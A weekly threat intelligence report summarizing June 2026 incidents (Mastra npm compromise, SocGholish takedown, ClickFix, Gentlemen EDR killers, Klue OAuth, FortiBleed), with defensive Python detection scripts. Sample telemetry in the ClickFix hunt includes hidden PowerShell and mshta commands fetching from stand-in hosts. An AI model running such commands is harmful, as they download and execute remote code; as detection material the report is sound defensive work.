Weekly Threat Intel Report — 2026-W25
TL;DR
Week 25 was bookended by two stories with outsized strategic significance. On one end, Microsoft formally attributed the Mastra AI npm supply chain compromise — over 140 poisoned packages with hidden postinstall payloads — to North Korea's Sapphire Sleet / BlueNoroff (the DPRK financial cluster also tracked as APT38). On the other, an international law enforcement coalition disrupted the SocGholish (TA569) fake-update botnet, which The Record and prior reporting tie to Russia-based Evil Corp (Indrik Spider). Between those bookends: ShinyHunters breached a major UK university, the Klue OAuth incident widened with a new "Icarus" extortion crew taking credit, the FortiBleed leak dumped credentials for nearly 74,000 FortiGate devices, and a new ransomware-as-a-service called Gentlemen stepped into public view with an industrial-grade EDR-killer toolkit.
Notable Activity by Actor
APT38 / Sapphire Sleet / BlueNoroff (DPRK)
Microsoft Threat Intelligence published a deep dive on June 18 describing a supply chain compromise of the Mastra AI framework's npm packages. According to Microsoft, the actor poisoned 140+ packages with postinstall hooks that delivered a hidden JavaScript payload during installation — a textbook supply chain technique (T1195.002) executed at scale against the AI developer ecosystem. BleepingComputer confirmed the DPRK attribution on June 20. The targeting of AI tooling continues a North Korean pattern of pivoting toward whichever ecosystem developers are most actively adopting, with the long-term goal of cryptocurrency theft and credential harvesting.
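The postinstall hook abuse described above (and the "disable lifecycle scripts in CI" takeaway later in this report) comes down to one question: which packages in the dependency tree run code at install time? The following Python script is an added example written for this report, not code from Microsoft or the Mastra project. It walks a node_modules tree, lists every preinstall/install/postinstall/prepare hook, and compares the result against an allowlist of packages that are expected to have one; the sample tree and package names it builds are constructed for the demonstration.

```python
"""Audit an npm dependency tree for install-time lifecycle scripts.

npm runs preinstall/install/postinstall/prepare hooks automatically during
`npm install`, so any package in the tree that declares one gets code
execution on the developer workstation or CI runner. This walks
node_modules (nested trees included), lists every such hook, and diffs the
result against an allowlist of packages that legitimately need one.
"""
import json
import os
import tempfile

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def find_install_scripts(node_modules: str) -> list[dict]:
    """Return one record per package.json that declares an install-time hook."""
    findings = []
    for root, _dirs, files in os.walk(node_modules):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(root, "package.json"), encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: not a finding by itself
        scripts = manifest.get("scripts") or {}
        hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
        if hooks:
            findings.append({
                "name": manifest.get("name") or os.path.relpath(root, node_modules),
                "version": manifest.get("version", "?"),
                "path": os.path.relpath(root, node_modules),
                "hooks": hooks,
            })
    return sorted(findings, key=lambda f: f["name"])


def unexpected_install_scripts(node_modules: str, allowlist: set[str]) -> list[dict]:
    """Findings for packages NOT on the allowlist; in CI a non-empty result should fail the build."""
    return [f for f in find_install_scripts(node_modules) if f["name"] not in allowlist]


def build_sample_tree() -> str:
    """Constructed node_modules tree for the demonstration; the package names are made up."""
    nm = os.path.join(tempfile.mkdtemp(prefix="npm-audit-"), "node_modules")
    manifests = {
        "plain-util": {"name": "plain-util", "version": "1.0.0",
                       "scripts": {"test": "jest"}},
        "native-addon": {"name": "native-addon", "version": "2.1.0",
                         "scripts": {"install": "node-gyp rebuild"}},
        "ai-helper": {"name": "ai-helper", "version": "0.0.9",
                      "scripts": {"postinstall": "node scripts/setup.js", "test": "jest"}},
        # a transitive dependency nested under ai-helper, to show the walk recurses
        "ai-helper/node_modules/inner-dep": {"name": "inner-dep", "version": "3.2.1",
                                            "scripts": {"preinstall": "node prep.js"}},
    }
    for rel, manifest in manifests.items():
        pkg_dir = os.path.join(nm, *rel.split("/"))
        os.makedirs(pkg_dir, exist_ok=True)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return nm


if __name__ == "__main__":
    tree = build_sample_tree()
    # native-addon is the one package we expect to compile on install; everything else is a finding
    for finding in unexpected_install_scripts(tree, allowlist={"native-addon"}):
        print(f"{finding['name']}@{finding['version']} ({finding['path']}): {finding['hooks']}")
```

Run it against a real checkout by pointing `find_install_scripts` at the project's `node_modules`. The audit complements, rather than replaces, turning hooks off: `npm ci --ignore-scripts` (or `ignore-scripts=true` in the CI runner's `.npmrc`) stops every hook, and the allowlist then tells you which packages need a separate, deliberate build step.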
Indrik Spider (Evil Corp) and TA569 (SocGholish)
The Record reported on June 19 that an international operation targeted SocGholish botnet infrastructure — the fake browser-update loader that has been one of the most prolific initial-access pipelines on the open internet for several years. The reporting links the SocGholish operation to Russia-based Evil Corp. While takedowns of loader networks frequently see infrastructure rebuilt within weeks, the disruption is a meaningful operational setback for downstream affiliates that have relied on SocGholish as a delivery layer.
INC Ransom
DarkReading's June 17 profile described INC Ransom's success as a product of disciplined fundamentals rather than novel tradecraft: exposed edge devices, weak or missing MFA, and a deliberate focus on sectors where downtime creates immediate pressure to pay. The group continues to operate a double-extortion model and has been particularly active in healthcare.
Vanilla Tempest (Vice Society)
DarkReading on June 16 linked the "Lorem Ipsum" / ClickFix delivery campaign — which uses compromised WordPress sites to coerce victims into pasting attacker commands into Run dialogs (T1204.004) — to Vanilla Tempest, the lineage descended from Vice Society. The pivot to ClickFix mirrors a broader 2026 trend: drive-by social engineering that bypasses many email-centric controls entirely.
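Because a ClickFix lure ends with the user pasting a command into the Run dialog or a browser-spawned prompt, the detection opportunity is in process-creation telemetry (parent process and command line), which is also the point of the "user-execution lures need a runtime answer" takeaway later in this report. The following Python script is an added example written for this report, not code from DarkReading or Red Canary. It scans Sysmon Event ID 1 records in JSON-lines form and flags script hosts spawned by a browser, or launched from the shell with a URL on the command line; the sample events, hostnames and paths are constructed.

```python
"""Flag process-creation events consistent with user-pasted command lures (ClickFix).

Input is Sysmon Event ID 1 (process create) as JSON lines, the shape most
log shippers emit. Two lineage signals matter: a script host whose parent is
a browser, and a script host launched from explorer.exe (the Run dialog
path) with a URL in its command line. Window-hiding or encoded-command
switches raise the confidence of an existing hit but are not a hit alone.
"""
import json
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
EVASION_RE = re.compile(r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|e(?:nc|ncodedcommand)?\s)", re.IGNORECASE)

# Constructed sample telemetry (domains use the reserved .invalid TLD; users and paths are made up).
SAMPLE_EVENTS = [
    r'{"EventID":1,"UtcTime":"2026-06-16 10:02:11.004","Image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"chrome.exe --profile-directory=Default"}',
    r'{"EventID":1,"UtcTime":"2026-06-16 10:05:40.217","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell.exe -File C:\\Users\\alice\\backup.ps1"}',
    r'{"EventID":1,"UtcTime":"2026-06-16 10:07:03.552","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell.exe -w hidden -c \"Invoke-WebRequest https://updates.example.invalid/verify\""}',
    r'{"EventID":1,"UtcTime":"2026-06-16 10:09:18.909","Image":"C:\\Windows\\System32\\mshta.exe","ParentImage":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe","CommandLine":"mshta.exe https://captcha.example.invalid/verify.hta"}',
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the detection reasons for one process-create record (empty list means benign)."""
    if event.get("EventID") != 1:
        return []
    child = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if child not in SCRIPT_HOSTS:
        return reasons
    if parent in BROWSERS:
        reasons.append("script host spawned directly by a browser")
    if parent == "explorer.exe" and URL_RE.search(cmd):
        reasons.append("script host launched from the shell (Run dialog path) with a URL in the command line")
    if reasons and EVASION_RE.search(cmd):
        reasons.append("window-hiding or encoded-command switch present")
    return reasons


def hunt(lines: list[str]) -> list[dict]:
    """Parse JSON-lines events and return only those that trigger at least one reason."""
    findings = []
    for line in lines:
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            findings.append({
                "time": event.get("UtcTime"),
                "image": event.get("Image"),
                "parent": event.get("ParentImage"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["time"], hit["image"], "<-", hit["parent"])
        for reason in hit["reasons"]:
            print("   ", reason)
```

The second sample (a scheduled PowerShell script launched from explorer.exe without a URL) is deliberately left unflagged: parent lineage alone is too noisy on admin workstations, so the rule requires the URL or browser-parent signal before it fires. Tune `BROWSERS` and `SCRIPT_HOSTS` to the software actually present in the estate.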
ShinyHunters
Check Point Research's June 15 bulletin reported that ShinyHunters claimed the breach of the University of Nottingham's student records system, exposing contact details of approximately 454,600 current and former students. The group has remained one of the most consistent data-theft brands operating publicly.
ClearFake
Red Canary's June 2026 Intelligence Insights confirmed ClearFake retained its #1 position in the firm's monthly community telemetry rankings. The persistence of ClearFake reinforces that fake-update social engineering remains one of the most successful initial access patterns in the wild.
Emerging Threats
Gentlemen RaaS and the EDR-killer arms race
ESET Research and BleepingComputer published parallel analyses on June 18 of Gentlemen, a ransomware-as-a-service operation maintaining a dedicated suite of EDR-killer drivers that it actively distributes to affiliates. ESET described the toolkit as the product of months of iterative development. The Record reported the same week that Australian sugar producer Mackay Sugar was working to restore harvesting and milling operations after a cyberattack Gentlemen claimed publicly. Defense evasion via vulnerable-driver abuse (T1562.001) is now a productized commodity rather than a bespoke capability.
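Baselining driver loads, as the "hunt for vulnerable-driver loads" takeaway later in this report recommends, is a small amount of logic once Sysmon Event ID 6 (driver loaded) is being collected. The following Python script is an added example written for this report, not code from ESET or BleepingComputer, and it does not contain any of the Gentlemen toolkit's indicators. It applies three checks to each driver-load record: hash on a vulnerable-driver blocklist, invalid or missing signature, and absence from a per-host-class baseline. The blocklist hashes, baseline paths and sample events are constructed placeholders; in production the blocklist would be loaded from a maintained feed such as the community LOLDrivers project.

```python
"""Hunt Sysmon Event ID 6 (driver loaded) records for EDR-tampering indicators.

Checks, in order of confidence: the driver's SHA256 is on a vulnerable-driver
blocklist; the signature is missing or invalid; the driver sits outside the
normal drivers directory; the driver is not in the host-class baseline.
Note that a vulnerable driver typically carries a VALID vendor signature;
that is what makes bring-your-own-vulnerable-driver work, so the hash check
must not be gated on signature status.
"""
import json

DRIVERS_DIR = "c:\\windows\\system32\\drivers\\"

# Placeholder digests standing in for a real blocklist; not the hash of any actual driver.
VULN_DRIVER_SHA256 = {
    "1111111111111111111111111111111111111111111111111111111111111111",
}
# Constructed baseline: lower-cased full paths recorded from a known-clean host build.
BASELINE_PATHS = {
    "c:\\windows\\system32\\drivers\\ndis.sys",
    "c:\\windows\\system32\\drivers\\tcpip.sys",
}

# Constructed sample events (hashes are made up; vendor names are fictitious).
SAMPLE_EVENTS = [
    r'{"EventID":6,"UtcTime":"2026-06-18 09:14:02.118","ImageLoaded":"C:\\Windows\\System32\\drivers\\ndis.sys","Hashes":"SHA256=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,MD5=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","Signed":"true","Signature":"Microsoft Windows","SignatureStatus":"Valid"}',
    r'{"EventID":6,"UtcTime":"2026-06-18 09:31:47.602","ImageLoaded":"C:\\ProgramData\\SysUpd\\drv_helper.sys","Hashes":"SHA256=1111111111111111111111111111111111111111111111111111111111111111,MD5=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb","Signed":"true","Signature":"Fictitious Vendor Ltd","SignatureStatus":"Valid"}',
    r'{"EventID":6,"UtcTime":"2026-06-18 09:40:10.330","ImageLoaded":"C:\\Windows\\System32\\drivers\\vendorx.sys","Hashes":"SHA256=cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc,MD5=cccccccccccccccccccccccccccccccc","Signed":"true","Signature":"Fictitious Vendor Ltd","SignatureStatus":"Valid"}',
    r'{"EventID":6,"UtcTime":"2026-06-18 09:41:55.001","ImageLoaded":"C:\\Windows\\System32\\drivers\\tcpip.sys","Hashes":"SHA256=dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd,MD5=dddddddddddddddddddddddddddddddd","Signed":"true","Signature":"Microsoft Windows","SignatureStatus":"Valid"}',
]


def parse_hashes(field: str) -> dict[str, str]:
    """Sysmon encodes hashes as 'SHA256=...,MD5=...'; return {ALGO: hexdigest}."""
    out = {}
    for part in field.split(","):
        algo, _, digest = part.partition("=")
        if algo and digest:
            out[algo.strip().upper()] = digest.strip().lower()
    return out


def assess(event: dict) -> list[str]:
    """Return detection reasons for one driver-load record (empty list means nothing to see)."""
    if event.get("EventID") != 6:
        return []
    path = event.get("ImageLoaded", "").lower()
    hashes = parse_hashes(event.get("Hashes", ""))
    reasons = []
    if hashes.get("SHA256") in VULN_DRIVER_SHA256:
        reasons.append("hash matches vulnerable-driver blocklist")
    if event.get("SignatureStatus", "").lower() != "valid":
        reasons.append("signature missing or invalid")
    if not path.startswith(DRIVERS_DIR):
        reasons.append("loaded from outside the drivers directory")
    if path not in BASELINE_PATHS:
        reasons.append("driver not in host baseline")
    return reasons


def severity(reasons: list[str]) -> str:
    if any("blocklist" in r for r in reasons):
        return "high"
    if any("signature" in r or "outside" in r for r in reasons):
        return "medium"
    return "low"


def hunt(lines: list[str]) -> list[dict]:
    """Parse JSON-lines events and return the ones with at least one reason, with a severity."""
    findings = []
    for line in lines:
        event = json.loads(line)
        reasons = assess(event)
        if reasons:
            findings.append({"time": event["UtcTime"], "driver": event["ImageLoaded"],
                             "severity": severity(reasons), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['time']} {f['driver']}: {'; '.join(f['reasons'])}")
```

The second sample is the case that matters: validly signed, so signature checks pass, but loaded from ProgramData with a blocklisted hash. A "low" result (in the drivers directory, signed, simply not in the baseline yet) is a baseline-update candidate rather than an incident, which is why the severity split is kept explicit.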
Icarus and the Klue / Salesforce chain
BleepingComputer reported on June 18–19 that the Klue Battlecards OAuth breach has been claimed by a new extortion group calling itself Icarus. Klue is the third Salesforce-integrated SaaS application in this campaign cluster to be compromised, and confirmed victims include cybersecurity vendor Huntress. The pattern — steal OAuth tokens from a connected app, then pivot into customer Salesforce tenants — has effectively replaced traditional credential phishing for downstream data theft in this campaign family.
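The connected-app pattern above is what the "inventory your Salesforce-connected applications" takeaway later in this report is about: a third-party app holding an API-level scope together with a refresh token is a durable, user-independent path into CRM data. The following Python script is an added example written for this report, not code from Klue, Salesforce, Huntress or BleepingComputer. It scores a list of OAuth grants by scope and staleness, and flags days where an app's API call volume jumps well above its recent baseline. The grant records, app names and daily counts are constructed; the script does not pull them from Salesforce, and the scope names used (`api`, `full`, `refresh_token`, `openid`, `id`) are standard Salesforce OAuth scopes.

```python
"""Audit Salesforce connected-app OAuth grants and watch for extraction spikes.

Two checks a CRM owner can run from exported data: (1) which connected apps
hold a broad data scope (api or full) together with a refresh token, and
which have gone unused; (2) whether any app's daily API call count has
jumped far above its own recent baseline, the signature of bulk extraction
through a compromised integration.
"""
from datetime import date, timedelta
from statistics import mean, pstdev

BROAD_SCOPES = {"api", "full"}               # read access to most or all objects
DURABLE_SCOPES = {"refresh_token", "offline_access"}  # access outlives the user session

TODAY = date(2026, 6, 21)  # constructed reference date for the sample data

# Constructed grant inventory (app names are fictitious).
SAMPLE_GRANTS = [
    {"app": "battlecard-vendor", "scopes": ["api", "refresh_token", "id"],
     "last_used": TODAY - timedelta(days=1), "users": 212},
    {"app": "legacy-report-tool", "scopes": ["full", "refresh_token"],
     "last_used": TODAY - timedelta(days=200), "users": 3},
    {"app": "sso-only-app", "scopes": ["openid", "id"],
     "last_used": TODAY - timedelta(days=2), "users": 540},
]

# Constructed daily API call counts for battlecard-vendor: a flat week, then a bulk pull.
SAMPLE_DAILY = [
    (date(2026, 6, 10) + timedelta(days=i), count)
    for i, count in enumerate([1200, 1350, 1100, 1280, 1190, 1310, 1240, 1300, 48000, 1250])
]


def assess_grant(grant: dict, today: date, stale_days: int = 90) -> list[str]:
    """Return the reasons a grant deserves review (empty list means it looks proportionate)."""
    scopes = set(grant["scopes"])
    reasons = []
    if "full" in scopes:
        reasons.append("full scope grants everything the user can reach")
    if scopes & BROAD_SCOPES and scopes & DURABLE_SCOPES:
        reasons.append("broad data scope plus refresh token: access survives the user session")
    if (today - grant["last_used"]).days > stale_days:
        reasons.append(f"unused for more than {stale_days} days; revoke")
    return reasons


def review_grants(grants: list[dict], today: date) -> list[dict]:
    """Grants with at least one reason, most reasons first."""
    out = [{"app": g["app"], "users": g["users"], "reasons": assess_grant(g, today)} for g in grants]
    return sorted((g for g in out if g["reasons"]), key=lambda g: -len(g["reasons"]))


def extraction_spikes(daily: list[tuple[date, int]], window: int = 7, k: float = 3.0) -> list[date]:
    """Flag days whose count exceeds mean + k*stdev of the preceding window.

    The stdev is floored at 10% of the mean so a perfectly flat baseline still
    requires a real jump before it fires.
    """
    flagged = []
    for i in range(window, len(daily)):
        prior = [c for _, c in daily[i - window:i]]
        mu = mean(prior)
        threshold = mu + k * max(pstdev(prior), 0.1 * mu)
        if daily[i][1] > threshold:
            flagged.append(daily[i][0])
    return flagged


if __name__ == "__main__":
    for g in review_grants(SAMPLE_GRANTS, TODAY):
        print(f"{g['app']} ({g['users']} users): {'; '.join(g['reasons'])}")
    for day in extraction_spikes(SAMPLE_DAILY):
        print(f"extraction spike on {day}")
```

In practice the grant list comes from the org's connected-app and OAuth usage reports and the daily counts from API event logs; the scoring is deliberately simple so it can be re-run after every scope change. Note that the busiest app in the sample (`battlecard-vendor`) is flagged on scope alone, before any spike: the durable broad-access combination is the exposure, and the volume check only tells you when it has been used.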
FortiBleed: ~74,000 FortiGate credentials exposed
Recorded Future and BleepingComputer reported on June 19 that a dataset containing valid administrative and VPN credentials for 73,932 FortiGate firewalls was leaked publicly, prompting urgent guidance from both CISA and UK NCSC. DarkReading reported that attackers were already using the data to target organizations in nearly 200 countries. Even where MFA is enforced on user logins, administrative paths and stale local accounts on edge devices are likely to be the primary exposure.
AutoJack and AI-agent attack surface
Microsoft researchers disclosed AutoJack on June 19 — a single-page exploit chain that abuses AutoGen Studio's MCP WebSocket, missing authentication on a localhost service, and unsafe parameter handling to achieve remote code execution on the host running an AI browsing agent. Separately, Unit 42 disclosed a Vertex AI Python SDK bucket-squatting flaw enabling cross-tenant RCE via pickle deserialization, and DarkReading documented a Microsoft Copilot "SearchLeak" one-click data theft chain (since patched). The pattern across all three: AI agents inherit the trust boundary of their host and the data their underlying services can reach, with very little of the input validation discipline mature web applications have built up over two decades.
EvilTokens: phishing without password theft
ESET on June 15 described EvilTokens, a phishing kit that subverts Microsoft's legitimate authentication flow — via device-code abuse — to harvest tokens without ever capturing a password or presenting a fake login page. The technique sidesteps password-strength controls, traditional credential-monitoring tooling, and many MFA implementations.
Splunk Enterprise actively exploited
BleepingComputer reported on June 19 that CISA ordered US federal agencies to patch a critical Splunk Enterprise vulnerability by Sunday, citing active exploitation in the wild. Any organization running Splunk on-prem should treat this as urgent.
Defender Takeaways
- Treat npm and PyPI as untrusted code paths. The Mastra compromise is the latest reminder that postinstall and equivalent hooks execute untrusted code on developer workstations and CI runners. Consider package allowlisting, lockfile pinning, and disabling lifecycle scripts in CI where feasible.
- Rotate Fortinet credentials and audit edge device admin paths. If you operate FortiGate devices, assume the FortiBleed dataset is in adversary hands. Rotate, enforce MFA on admin and VPN paths, and check for stale or shared accounts.
- Inventory your Salesforce-connected applications. The Klue / Icarus pattern is now a recurring playbook. Every connected app is a transitive trust path into your CRM data. Audit OAuth grants, restrict scopes, and monitor for anomalous data extraction by integrated apps.
- Hunt for vulnerable-driver loads. With Gentlemen turning EDR killers into a productized RaaS feature, blue teams should baseline driver loads and alert on known vulnerable drivers used for EDR tampering.
- User-execution lures (ClickFix) need a runtime answer. Vanilla Tempest and ClearFake both lean on user-pasted commands. Pure email controls do not catch this — focus on script-host execution telemetry and Run-dialog activity from browser child processes.
- Patch Splunk Enterprise now. CISA listed the issue as actively exploited with a tight federal deadline; private organizations should mirror that urgency.
- Govern AI agents as identities. AutoJack and the Copilot SearchLeak chain reinforce that AI agents running on workstations or in cloud tenants need explicit authentication, scoped permissions, and treatment as their own identity class.
Sources
- Microsoft Threat Intelligence — From package to postinstall payload: Inside the Mastra npm supply chain compromise by Sapphire Sleet — https://www.microsoft.com/en-us/security/blog/2026/06/17/postinstall-payload-inside-mastra-npm-supply-chain-compromise/
- BleepingComputer — Microsoft links Mastra AI supply chain attack to North Korean hackers — https://www.bleepingcomputer.com/news/security/microsoft-links-mastra-ai-supply-chain-attack-to-north-korean-hackers/
- The Record — Police raid malware network tied to Russia's Evil Corp hacker group — https://therecord.media/socgholish-botnet-disrupted
- DarkReading — INC Ransomware Thrives by Mastering the Basics — https://www.darkreading.com/cyberattacks-data-breaches/inc-ransomware-thrives-by-mastering-the-basics
- DarkReading — 'Lorem Ipsum' Malware Pivots to ClickFix Delivery — https://www.darkreading.com/cyberattacks-data-breaches/lorem-ipsum-malware-clickfix-delivery
- Check Point Research — 15th June Threat Intelligence Report — https://research.checkpoint.com/2026/15th-june-threat-intelligence-report/
- Red Canary — Intelligence Insights: June 2026 — https://redcanary.com/blog/threat-intelligence/intelligence-insights-june-2026/
- ESET Research — Killing me gently: Inside Gentlemen's EDR killer framework — https://www.welivesecurity.com/en/eset-research/killing-me-gently-inside-gentlemens-edr-killer-framework/
- BleepingComputer — Gentlemen ransomware uses multiple EDR killers to disable defenses — https://www.bleepingcomputer.com/news/security/gentlemen-ransomware-uses-multiple-edr-killers-to-disable-defenses/
- The Record — Australian sugar producer works to restore operations as ransomware group claims attack — https://therecord.media/mackay-sugar-cyberattack-claimed-gentlemen
- BleepingComputer — Klue OAuth breach victim list grows as Icarus hackers claim attack — https://www.bleepingcomputer.com/news/security/klue-oauth-breach-victim-list-grows-as-icarus-hackers-claim-attack/
- DarkReading — Salesforce Data Thefts Continue via Klue App Compromise — https://www.darkreading.com/cyberattacks-data-breaches/salesforce-data-thefts-klue-app-compromise
- Recorded Future — FortiBleed Campaign Exposing Credentials for 73,932 FortiGate Systems — https://www.recordedfuture.com/blog/critical-fortibleed-campaign
- UK NCSC — Alert: NCSC issues advice following global targeting of Fortinet firewalls and VPN gateways — https://www.ncsc.gov.uk/news/advice-following-global-targeting-of-fortinet-firewalls-and-vpn-gateways
- BleepingComputer — CISA warns Fortinet users to secure devices after FortiBleed leak — https://www.bleepingcomputer.com/news/security/cisa-warns-fortinet-users-to-secure-devices-after-fortibleed-leak/
- Microsoft Threat Intelligence — AutoJack: How a single page can RCE the host running your AI agent — https://www.microsoft.com/en-us/security/blog/2026/06/18/autojack-single-page-rce-host-running-ai-agent/
- Unit 42 — Pickle in the Middle – Hijacking Vertex AI Model Uploads for Cross-Tenant RCE — https://unit42.paloaltonetworks.com/hijacking-vertex-ai-model/
- ESET — EvilTokens: A phishing attack that doesn't steal your password — https://www.welivesecurity.com/en/cybercrime/eviltokens-phishing-doesnt-steal-password/
- BleepingComputer — CISA: Splunk Enterprise flaw actively exploited, patch by Sunday — https://www.bleepingcomputer.com/news/security/cisa-splunk-enterprise-flaw-actively-exploited-patch-by-sunday/
- BleepingComputer — New Prinz Eugen ransomware prioritizes recent files for encryption — https://www.bleepingcomputer.com/news/security/new-prinz-eugen-ransomware-prioritizes-recent-files-for-encryption/